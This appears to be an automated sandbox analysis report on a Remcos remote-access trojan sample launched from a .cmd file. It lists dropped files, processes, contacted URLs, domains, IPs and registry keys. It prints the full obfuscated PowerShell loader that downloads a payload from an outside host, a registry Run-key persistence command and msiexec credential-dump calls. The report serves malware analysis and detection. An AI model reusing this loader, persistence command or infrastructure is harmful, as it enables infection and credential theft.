Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
rIMG465244247443GULFORDEROpmagasinering.cmd
|
ASCII text, with very long lines (6138), with no line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\biljl.vbs
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nhrkykzt.iy5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pf2hhutw.l1c.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vd4vqodm.w5c.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z32uhnbf.ph5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhvF678.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x57c24073, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\pvaqv
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y9CC0PCII26P6XS9DIN2.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Rafting.Ans
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMG465244247443GULFORDEROpmagasinering.cmd" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated
amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If
($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous
-lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function
Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over
';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy
e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar
eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre
0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian
' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr
DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian
'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB
SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a
esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT
T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA
olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou
PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE
FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa
iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT
rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian
'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT
lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag t.ree.MorgwRealEA erbThencNbenL eomI pereAsteNSolbTSta ');Yderzoner
($exhaust);Yderzoner (Abkhasian 'Twil$ T aPWig aStrarHeteeGenenMlketT veh weeoBirkoskradS,lf. S rHUpbre araOmkrdUdfoeInter
eesOutk[Hot $Em eG BreeContn,ossbS.gnrSpirusl dgIllieCratlTilbiSynagonom] D s=Frys$BaggSBiogt aaneo ernTusib S.mr traoIn ie
Fo,rAna, ');$Ufejlbarlighed=Abkhasian ' P c$ adePUnguaGlorrKoloeChopnIndotGerahG nno esvoViv,dsyss.GadfD pr oTilbwLi,unhon,lCosto.lmuaH
pod KvaFAenditradl.cceeInt ( T.v$Pan,BJomfrMar uCanctMut th.smoRefen ,auaTr ctE,teiOve,o TrinFucha orslCounpTerrra deoInned
Jasu TrskBlgmtDyreeUsigr.ingnCicaeFdevsUnyt,Tilr$harpmRen.oR ddd AeoeBesir L,vmV,garThulk ytefeberNonssPseu)Gauf ';$modermrkers=$embusque;Yderzoner
(Abkhasian ',nfr$.blaG SkoLFrsto V,kBCapmamiljlAppr: Fo CTy eI onacForsh Mata,ljlr Bel1Seng3Ber 9Palc=Unde( smitVinkEGunpS
T fT,ese-MossPblyaabasitGrodHEpin Knur$ P.jMIndbOAfgrDSur EStjeRKodemForkRCamekSam ePersr oursNait)Cuad ');while (!$Cichar139)
{Yderzoner (Abkhasian 'Coll$Se,sgNat.lBudgoEnogbStenaA ullNonm:neohC Repo RevrSte.vJambe E dn ers=K,mu$ HaatI.klr ampu.ulteSisi
') ;Yderzoner $Ufejlbarlighed;Yderzoner (Abkhasian ' ,oys epTta gaDmonrHelsTNump-Bn ksFjerLFri ENoncEJuleP Dia Hjbe4 ,an
');Yderzoner (Abkhasian 'E is$Be ag EneLSemiOLil,b Gr,ATilfl lev:Tra,c AggIUdskcPhe.HDemea CorRReco1 Mdd3 Cya9 Bes=Skru(RegiTFejleQuinsTa
gT ,ap-DvrgpInapaA fiTBel HA,kv B oe$IchtMDefaOExo dUntheCow,R forMNontrS roKfsteewagerCombsBusk) St ') ;Yderzoner (Abkhasian
'Fing$ScinGOverl E,yo UraBCrepASynalExte:Dagbc verlAddeA .rosUmbisRuthfFrimeSt,pl ImmLT onO CoxWAgit=R.ru$S emGAnnul Deso
.chbc,naaLocoL ,ou:Coext isiITranl pans digk DrudNondEMamaT Spe+Disp+Ere.% Spn$Brans ranT.lynu Le D EmbEEmbanHobet luse FrorSog
BForrR.efadstudEKiddtSt r.glosCIantoSt iuSum,NIndrtSuk, ') ;$Bruttonationalprodukternes=$Studenterbrdet[$Classfellow];}$Stes=297654;$Overconsumption105=29597;Yderzoner
(Abkhasian 'Rum,$tempgHttel iffO HypbDimiAAntiLNov.: eodP rusrQuanoKunoS Z,fEudgyc atTBrileLivsdKan, Te.t=Audi Fly gInsoEDagltMono-Exp.CTalio
Tagn,ntitgnieEVrinNFeritOutg Syst$narkMHandO tykDP oceS,avRFlommEd.fRIodoKSt,nE BusRVareSSels ');Yderzoner (Abkhasian ' Kur$flyvg
AmalBejeoSintbPla aKommlStra:Oms.V r tePorcl LetuDonexFore El,t= cal Te s[.lueSVidey nasHelot,sore odemArmo. ComCFng oCh
fn.igtv oneo errAnt.tChri]Depo:Affl: SlaFOverrSupeoo,temProdB ixiaXylosSmelePjan6Misa4oxygS ErotHjderCeleiUdtrnTrung Fis(Dema$C
sePLu,pr.ndeo PibsWinde,uslcH,lhtArrie m rdfabl)Spag ');Yderzoner (Abkhasian 'Rove$OrkeGHi slGento Strb FadANonelHerc:PentBBag.i
BeeoAntif KonO ,ndGUrop Mid =T ls Rus[SkalsSymbYAwessU.deToryzeLuftMRe,i. SartHarleUndeXFraft Fas. Bu Eala,nEm iCN neO AfpdBortITubenDa
nGSelv]Brne: Kul:Fejla O kSbefacPreoIDesmiBoks.AmorG.ekse Q aT BessA.sttIsocRHi rISpr NprecGE,ne(Anve$ indvK,lleCircL S.ruUpwiXabso)Isla
');Yderzoner (Abkhasian ' De $BarnGGodklRepuOPartbBybiaUndel Uar: CelsOmdbm FodMCongELi sNS.ndeBiki=Femd$AlbiB UfoI ooeo ndif
Re o ,fggDelu.ZoomsB,tjuPatebTurfShemiTSid RSticirestnSantgDdeb( Ya,$NoncS C,rt AneeGesnsA,li,Apos$ B,sOMaskvstepePyroRS ric.rkpOOvernPaupS
EthuFiskm Inhp P aT acrIFelloNominPaat1La.o0Ult.5Adul) Pro ');Yderzoner $Smmene;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens
Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard
#>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes;
for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function
Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over
';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy
e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar
eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre
0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian
' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr
DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian
'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB
SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a
esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT
T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA
olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou
PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE
FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa
iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT
rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian
'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT
lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag t.ree.MorgwRealEA erbThencNbenL eomI pereAsteNSolbTSta ');Yderzoner
($exhaust);Yderzoner (Abkhasian 'Twil$ T aPWig aStrarHeteeGenenMlketT veh weeoBirkoskradS,lf. S rHUpbre araOmkrdUdfoeInter
eesOutk[Hot $Em eG BreeContn,ossbS.gnrSpirusl dgIllieCratlTilbiSynagonom] D s=Frys$BaggSBiogt aaneo ernTusib S.mr traoIn ie
Fo,rAna, ');$Ufejlbarlighed=Abkhasian ' P c$ adePUnguaGlorrKoloeChopnIndotGerahG nno esvoViv,dsyss.GadfD pr oTilbwLi,unhon,lCosto.lmuaH
pod KvaFAenditradl.cceeInt ( T.v$Pan,BJomfrMar uCanctMut th.smoRefen ,auaTr ctE,teiOve,o TrinFucha orslCounpTerrra deoInned
Jasu TrskBlgmtDyreeUsigr.ingnCicaeFdevsUnyt,Tilr$harpmRen.oR ddd AeoeBesir L,vmV,garThulk ytefeberNonssPseu)Gauf ';$modermrkers=$embusque;Yderzoner
(Abkhasian ',nfr$.blaG SkoLFrsto V,kBCapmamiljlAppr: Fo CTy eI onacForsh Mata,ljlr Bel1Seng3Ber 9Palc=Unde( smitVinkEGunpS
T fT,ese-MossPblyaabasitGrodHEpin Knur$ P.jMIndbOAfgrDSur EStjeRKodemForkRCamekSam ePersr oursNait)Cuad ');while (!$Cichar139)
{Yderzoner (Abkhasian 'Coll$Se,sgNat.lBudgoEnogbStenaA ullNonm:neohC Repo RevrSte.vJambe E dn ers=K,mu$ HaatI.klr ampu.ulteSisi
') ;Yderzoner $Ufejlbarlighed;Yderzoner (Abkhasian ' ,oys epTta gaDmonrHelsTNump-Bn ksFjerLFri ENoncEJuleP Dia Hjbe4 ,an
');Yderzoner (Abkhasian 'E is$Be ag EneLSemiOLil,b Gr,ATilfl lev:Tra,c AggIUdskcPhe.HDemea CorRReco1 Mdd3 Cya9 Bes=Skru(RegiTFejleQuinsTa
gT ,ap-DvrgpInapaA fiTBel HA,kv B oe$IchtMDefaOExo dUntheCow,R forMNontrS roKfsteewagerCombsBusk) St ') ;Yderzoner (Abkhasian
'Fing$ScinGOverl E,yo UraBCrepASynalExte:Dagbc verlAddeA .rosUmbisRuthfFrimeSt,pl ImmLT onO CoxWAgit=R.ru$S emGAnnul Deso
.chbc,naaLocoL ,ou:Coext isiITranl pans digk DrudNondEMamaT Spe+Disp+Ere.% Spn$Brans ranT.lynu Le D EmbEEmbanHobet luse FrorSog
BForrR.efadstudEKiddtSt r.glosCIantoSt iuSum,NIndrtSuk, ') ;$Bruttonationalprodukternes=$Studenterbrdet[$Classfellow];}$Stes=297654;$Overconsumption105=29597;Yderzoner
(Abkhasian 'Rum,$tempgHttel iffO HypbDimiAAntiLNov.: eodP rusrQuanoKunoS Z,fEudgyc atTBrileLivsdKan, Te.t=Audi Fly gInsoEDagltMono-Exp.CTalio
Tagn,ntitgnieEVrinNFeritOutg Syst$narkMHandO tykDP oceS,avRFlommEd.fRIodoKSt,nE BusRVareSSels ');Yderzoner (Abkhasian ' Kur$flyvg
AmalBejeoSintbPla aKommlStra:Oms.V r tePorcl LetuDonexFore El,t= cal Te s[.lueSVidey nasHelot,sore odemArmo. ComCFng oCh
fn.igtv oneo errAnt.tChri]Depo:Affl: SlaFOverrSupeoo,temProdB ixiaXylosSmelePjan6Misa4oxygS ErotHjderCeleiUdtrnTrung Fis(Dema$C
sePLu,pr.ndeo PibsWinde,uslcH,lhtArrie m rdfabl)Spag ');Yderzoner (Abkhasian 'Rove$OrkeGHi slGento Strb FadANonelHerc:PentBBag.i
BeeoAntif KonO ,ndGUrop Mid =T ls Rus[SkalsSymbYAwessU.deToryzeLuftMRe,i. SartHarleUndeXFraft Fas. Bu Eala,nEm iCN neO AfpdBortITubenDa
nGSelv]Brne: Kul:Fejla O kSbefacPreoIDesmiBoks.AmorG.ekse Q aT BessA.sttIsocRHi rISpr NprecGE,ne(Anve$ indvK,lleCircL S.ruUpwiXabso)Isla
');Yderzoner (Abkhasian ' De $BarnGGodklRepuOPartbBybiaUndel Uar: CelsOmdbm FodMCongELi sNS.ndeBiki=Femd$AlbiB UfoI ooeo ndif
Re o ,fggDelu.ZoomsB,tjuPatebTurfShemiTSid RSticirestnSantgDdeb( Ya,$NoncS C,rt AneeGesnsA,li,Apos$ B,sOMaskvstepePyroRS ric.rkpOOvernPaupS
EthuFiskm Inhp P aT acrIFelloNominPaat1La.o0Ult.5Adul) Pro ');Yderzoner $Smmene;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pvaqv"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sxfiolkk"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\crtbpevmxvde"
|
|
|
|
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ
/d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle
1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://plieltd.top
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://www.microsoft.cw
|
unknown
|
||
|
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
|
unknown
|
||
|
http://www.imvu.comta
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingth
|
unknown
|
||
|
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaotak
|
unknown
|
||
|
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
|
unknown
|
||
|
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
|
unknown
|
||
|
http://geoplugin.net/json.gpH
|
unknown
|
||
|
https://maps.windows.com/windows-app-web-link
|
unknown
|
||
|
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://geoplugin.net/json.gpT
|
unknown
|
||
|
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
|
unknown
|
||
|
https://plieltd.top/Underbyggelse.aaf
|
172.67.155.139
|
||
|
https://plieltd.top/FevmSBTRsrPt160.bin
|
172.67.155.139
|
||
|
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
|
unknown
|
||
|
https://www.office.com/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
|
unknown
|
||
|
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
|
unknown
|
||
|
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://geoplugin.net/json.gpl
|
unknown
|
||
|
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
|
unknown
|
||
|
https://plieltd.top
|
unknown
|
||
|
http://geoplugin.net/json.gpk
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://plieltd.top/Underbyggelse.aafP
|
unknown
|
||
|
http://crl.microB
|
unknown
|
||
|
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://geoplugin.net/json.gpt
|
unknown
|
||
|
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
|
unknown
|
||
|
http://geoplugin.net/json.gpz
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
|
https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
|
unknown
|
||
|
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
|
https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
|
unknown
|
||
|
https://plieltd.top/Underbyggelse.aafXR$lX
|
unknown
|
||
|
https://aka.ms/pscore6lBtq
|
unknown
|
||
|
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 63 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
pelele.duckdns.org
|
185.236.203.101
|
|
|
|
plieltd.top
|
172.67.155.139
|
||
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.236.203.101
|
pelele.duckdns.org
|
Romania
|
|
|
|
172.67.155.139
|
plieltd.top
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
